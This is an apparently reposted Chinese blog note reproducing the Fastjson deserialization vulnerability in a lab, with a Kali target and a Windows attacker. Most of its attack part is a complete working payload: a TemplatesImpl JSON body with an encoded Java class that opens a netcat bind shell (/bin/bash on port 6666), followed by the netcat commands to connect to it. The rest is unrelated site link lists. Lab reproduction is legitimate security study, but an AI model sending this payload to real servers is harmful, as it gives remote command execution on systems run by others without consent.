Fastjson1.0漏洞复现

2023-11-14

服务器kali linux
攻击机win10
搭建好环境之后，测试漏洞
在这里插入图片描述
证明存在漏洞
生成payload
{"@type":“com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl”,"_bytecodes":[“yv66vgAAADQAsAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEABENvZGUKAAMACQwABQAGCgALAA0HAAwBABFqYXZhL2xhbmcvUnVudGltZQwADgAPAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAEQEAGm5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCgALABMMABQAFQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsKABcAGQcAGAEAE2phdmEvaW8vSU9FeGNlcHRpb24MABoABgEAD3ByaW50U3RhY2tUcmFjZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABlMY29tL3NlY2ZyZWUvd3d3L1BheWxvYWQ7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwAmAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAJcmVhZENsYXNzAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsHADMBABtqYXZhc3Npc3QvTm90Rm91bmRFeGNlcHRpb24HADUBACBqYXZhc3Npc3QvQ2Fubm90Q29tcGlsZUV4Y2VwdGlvbgoANwA5BwA4AQATamF2YXNzaXN0L0NsYXNzUG9vbAwAOgA7AQAKZ2V0RGVmYXVsdAEAFygpTGphdmFzc2lzdC9DbGFzc1Bvb2w7CgA3AD0MAD4APwEAA2dldAEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmFzc2lzdC9DdENsYXNzOwoAQQBDBwBCAQARamF2YXNzaXN0L0N0Q2xhc3MMAEQARQEACnRvQnl0ZWNvZGUBAAQoKVtCCgBHAEkHAEgBABBqYXZhL3V0aWwvQmFzZTY0DABKAEsBAApnZXRFbmNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwoATQBPBwBOAQAYamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyDABQAFEBAA5lbmNvZGVUb1N0cmluZwEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAljbGFzc25hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcAEAFUxqYXZhc3Npc3QvQ2xhc3NQb29sOwEAAmNjAQATTGphdmFzc2lzdC9DdENsYXNzOwEAAWIBAAJbQgEAB3BheWxvYWQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwcAXQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyCABfAQBVeyJAdHlwZSI6ImNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwiLCJfYnl0ZWNvZGVzIjpbIgoAXABhDAAFAGIBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYIAGQBABdjb20uc2VjZnJlZS53d3cuUGF5bG9hZAoAAQBmDAAwADEKAFwAaAwAaQBqAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7CABsAQADIl0sCABuAQAPIl9uYW1lIjoic2hpdCIsCABwAQAPIl90ZmFjdG9yeSI6e30sCAByAQAWIl9vdXRwdXRQcm9wZXJ0aWVzIjp7fQgAdAEAAX0KAFwAdgwAdwBbAQAIdG9TdHJpbmcBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgkAewB9BwB8AQAQamF2YS9sYW5nL1N5c3RlbQwAfgB/AQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07CACBAQBFKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgCDAIUHAIQBABNqYXZhL2lvL1ByaW50U3RyZWFtDACGAGIBAAdwcmludGxuCACIAQBFKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqCACKAQBNKiAgICAgICAgICAgICAgICAgIEZhc3Rqc29uIOWPjeW6j+WIl+WMluWPjeW8uSBTaGVsbCDohJrmnKwgICAgICAgICAgICAgICAgICoIAIwBAEUqICAgICAgICAgICAgICAgICAgICAgICAgICB3d3cuc2VjZnJlZS5jb20gICAgICAgICAgICAgICAgICAgICAgICAgICoIAI4BAEYqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKCACQAQA5WypdIFVzYWdlOiBqYXZhIC1qYXIgRmFzdGpzb24tUGF5bG9hZC5qYXIgLS11c2UgMjAxNzAzMTUgCACSAQBpCSAyMDE3MDMxNSA9PiB7W0Zhc3Rqc29uIDw9IDEuMi4yNF0gW2h0dHBzOi8vZ2l0aHViLmNvbS9hbGliYWJhL2Zhc3Rqc29uL3dpa2kvc2VjdXJpdHlfdXBkYXRlXzIwMTcwMzE1XX0KCACUAQAIMjAxNzAzMTUKAJYAmAcAlwEAEGphdmEvbGFuZy9TdHJpbmcMAJkAmgEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWggAnAEAKQpbKl0gVXNhZ2U6IFtGYXN0anNvbiBWZXJzaW9uIDw9IDEuMi4yNF0KCACeAQAoWytdIGNvbW1hbmQ6IG5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCggAoAEAGFsqXSBHZW5lcmF0ZSBQYXlsb2FkOgoKCgoAAQCiDABaAFsIAKQBAAIKCggApgEAGlsrXSBTaGVsbDogbmMgYXR0YWNrIDY2NjYKCgCDAKgMAKkAYgEABXByaW50AQAEYXJncwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQAMUGF5bG9hZC5qYXZhAQAMSW5uZXJDbGFzc2VzAQAHRW5jb2RlcgAhAAEAAwAAAAAABgABAAUABgABAAcAAAB4AAIAAgAAABYqtwAIuAAKEhC2ABJXpwAITCu2ABaxAAEABAANABAAFwADABsAAAAWAAUAAAAcAAQAHgANAB8AEQAgABUAIgAcAAAAFgACAAAAFgAdAB4AAAARAAQAHwAgAAEAIQAAABAAAv8AEAABBwABAAEHABcEAAEAIgAjAAIAJAAAAAQAAQAlAAcAAAA/AAAAAwAAAAGxAAAAAgAbAAAABgABAAAAJAAcAAAAIAADAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACkAKgACAAEAIgArAAIAJAAAAAQAAQAlAAcAAABJAAAABAAAAAGxAAAAAgAbAAAABgABAAAAJwAcAAAAKgAEAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACwALQACAAAAAQAuAC8AAwAJADAAMQACACQAAAAIAAMAFwAyADQABwAAAGsAAgAEAAAAF7gANkwrKrYAPE0stgBATrgARi22AEywAAAAAgAbAAAAEgAEAAAAKgAEACsACgAsAA8ALQAcAAAAKgAEAAAAFwBSAFMAAAAEABMAVABVAAEACgANAFYAVwACAA8ACABYAFkAAwAJAFoAWwACACQAAAAIAAMAFwAyADQABwAAAGYAAwAAAAAALrsAXFkSXrcAYBJjuABltgBnEmu2AGcSbbYAZxJvtgBnEnG2AGcSc7YAZ7YAdbAAAAACABsAAAAeAAcAAAAxAAkAMwAWADQAGwA1ACAANgAlADcAKgAxABwAAAACAAAACQB4AHkAAgAkAAAACAADABcAMgA0AAcAAAEDAAQAAQAAAJEqvp0ATrIAehKAtgCCsgB6Eoe2AIKyAHoSibYAgrIAehKHtgCCsgB6Eou2AIKyAHoSh7YAgrIAehKNtgCCsgB6Eo+2AIKyAHoSkbYAgqcAQxKTKgQytgCVmQA4sgB6Epu2AIKyAHoSnbYAgrIAersAXFkSn7cAYLgAobYAZxKjtgBntgB1tgCCsgB6EqW2AKexAAAAAwAbAAAAQgAQAAAAOwAFADwADQA9ABUAPgAdAD8AJQBAAC0AQQA1AEIAPQBDAEUARABNAEUAWwBGAGMARwBrAEgAiABJAJAATwAcAAAADAABAAAAkQCqAKsAAAAhAAAABgAC+wBQPwACAKwAAAACAK0ArgAAAAoAAQBNAEcArwAJ”],"_name":“shit”,"_tfactory":{},"_outputProperties":{}}

在这里插入图片描述

然后win10监听

在这里插入图片描述

成功弹回shell.

因为利用的是nc反弹，所以要确保靶机可以执行nc命令
靶机执行：nc -l -p 6666 -e /bin/bash
本机：nc 192.168.80.155(靶机地址) 6666

参考文章：https://www.secfree.com/article/591.html

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

个人笔记

学习

Fastjson1.0漏洞复现的相关文章

Spring 框架中都用到了哪些设计模式

1 工厂模式 BeanFactory就是简单工厂模式的体现用来创建对象的实例 2 单例模式 Bean默认为单例模式 3 代理模式 Spring的AOP功能用到了JDK的动态代理和CGLIB字节码生成技术 4 模板方法用来解决代码重复的问
Python：Docx文档模板创建使用

博文作者 wangzirui32 喜欢的可以点赞收藏关注哦本文首发于CSDN 未经许可禁止转载 Hello 大家好我是wangzirui32 今天我们来学习Docx文档模板创建与使用开始学习吧 1 Docxtpl Docxtpl
服务器加cpu显示broadwell,英特尔新的Broadwell Xeon服务器CPU每个插槽可提供多达22个内核...

英特尔的主流消费类处理器主要是双核和四核处理器但是服务器CPU的性能要高得多恰当的例子基于Broadwell的新型Xeon E5 2600 v4系列中最昂贵的成员具有高达22个内核运行频率为2 2GHz 而所有这些内核都只能装在一个

随机推荐

java中html网页转化成pdf（itext）

Java 实现 HTML 页面转 PDF 解决方案一添加 maven 依赖
Centos for arm64 aarch64 下载地址列表以及鲲鹏服务器安装教程

鲲鹏服务器安装Centos 7 6教程镜像下载地址一 BIOS 配置二通过BMC界面的虚拟光驱安装 1 虚拟光驱挂载系统ISO镜像 2 设置启动项为光驱启动 3 重启服务器三下载驱动软件包和驱动配套表 1 驱动下载 2 驱动安装
LeetCode 523. Continuous Subarray Sum 解题报告

LeetCode 523 Continuous Subarray Sum 解题报告题目描述 Given a list of non negative numbers and a target integer k write a funct
Oracle重命名sys或system操作记录

oracle等保中有条要求应重命名或删除默认账户修改默认账户的默认口令给的建议是修改sys system默认账户名称避免使用常见用户名称以下记录了两种方法来实现上面的要求 Oracle重命名sys操作记录方法一通过用户的信息是
android 手机获取是否开启了底部导航栏兼容小米、华为

TargetApi Build VERSION CODES JELLY BEAN MR1 public static boolean isNavigationBarShow WindowManager windowManager Displ
Qt5.9调用Windows的匿名管道总结

匿名管道一般用于两个父子进程之间的通信通常是在MFC上调用在Windows上匿名管道的调用函数为CreatePipe 具体的原理讲解和调用实例可以参考博主的这篇博客 https blog csdn net naibozhuan374
Python爬虫学了几个月却不敢接单？过来人的经验总结收好！

前几天有刷到一个提问爬虫学了几个月了却还是不敢上手去接单爬虫接单靠不靠谱有些新手心里会犯嘀咕怕不小心就踩了红线作为过来人也接过不少单来浅聊一下我的经验这篇所说的经验总结可能更适合爬虫新手爬虫大佬可以忽略此篇小结 Pytho
git拉取项目、提交代码简单教程

最近要用HBuilderX做一个uniapp项目再写一篇git拉项目代码交代码的文章虽然和上一篇差不多啦不过就是上一篇的交代码没有用指令这一篇就用一下首先是要装好git和node 可以自行查找教程应该没什么坑第一步新建一个
Vue3国际化适配（i18n）的简单使用（非常简单）

Vue i18n是Vue js的国际化插件 Vue i18n官网 Vue I18n Vue I18n 下载Vue i18n插件 npm方式 npm install vue i18n 9 yarn方式 yarn add vue i18n 9
Linux系统编程项目——FTP云盘

文章目录一项目实现功能二项目实现思路三项目用到的函数 1 access函数判断文件是否存在的函数 2 chdir函数进入某个文件夹的函数 3 fgets函数可以获取空格且较为安全四代码五项目总结遇到的问题一
EtherCAT有什么优点？为何如此受欢迎？

1 高速以太网 EtherCAT非常快它使用双绞线或光缆可以在30us内处理1000个分布式I O信号或在100us内处理100个轴 2 精确同步最大的优点具有纳秒级别的同步性协议栈处理延迟仅需要几纳秒 3 灵活的拓扑结构 Eth
华北电力大学计算机学科排名,2018年华北电力大学世界排名、中国排名、专业排名...

华北电力大学成立于1958年原名北京电力学院该学院于1969年从河北省迁至北京先后更名为河北电力学院和华北电力学院 1995年华北电力学院和北京电力经济学院合并为华北电力大学华北电力大学拥有10所学院包括电气与电子工程学院能源
mysql主键字符串_MYSQL - 使用字符串作为主键的问题

SET OLD UNIQUE CHECKS UNIQUE CHECKS UNIQUE CHECKS 0 SET OLD FOREIGN KEY CHECKS FOREIGN KEY CHECKS FOREIGN KEY CHECKS 0 S
make[1]: *** No rule to make target ‘.depend.XXXX‘, needed by ‘.XX‘. Stop.解决

最近在移植uboot支持NANDFLASH时遇到一个错误烦了两天终于找到了具体报错如下 make 1 No rule to make target depend s3c2440 nand needed by depend Stop
不能建立到远程计算机的连接,因此用于此连接的端口已关闭

点击跳转端口 1723 1701
Please make sure the TESSDATA_PREFIX environment variable is set to your “tessdata“ directory.

解决识别中文 tesseract scan jpg test txt l chi sim eng
spring boot jpa之流式查询 @Query定义查询方法

一概述按照方法名来定义查询方法的形式只适用于单表的一两个字段那种复杂的查询还要自己写sql语句也就是 Query定义查询方法以下是 Query和 Param的类路径 import org springframework dat
学习Python爬虫的基础知识和入门教程

学习Python爬虫需要掌握以下基础知识 1 Python语言基础学习Python爬虫前需要先学习Python基础语法数据类型控制结构等基本概念 2 网络协议爬虫需要通过网络获取数据因此需要掌握HTTP协议 TCP IP协议等相关
TCP/IP网络模型中数据封装和解封装过程

当我们在网络上传输数据时本机会从高层到底层将数据包进行几次封装解包过程则是相反的顺序如下图所示封装首先在应用层浏览器会将请求数据封装为HTTP协议数据包在原本数据包中加入HTTP头传输层 tcp协议将前一个封装的数据包再次封
Fastjson1.0漏洞复现

服务器kali linux 攻击机win10 搭建好环境之后测试漏洞证明存在漏洞生成payload type com sun org apache xalan internal xsltc trax TemplatesImpl byt

Fastjson1.0漏洞复现

Fastjson1.0漏洞复现 的相关文章

随机推荐

热门标签

Fastjson1.0漏洞复现的相关文章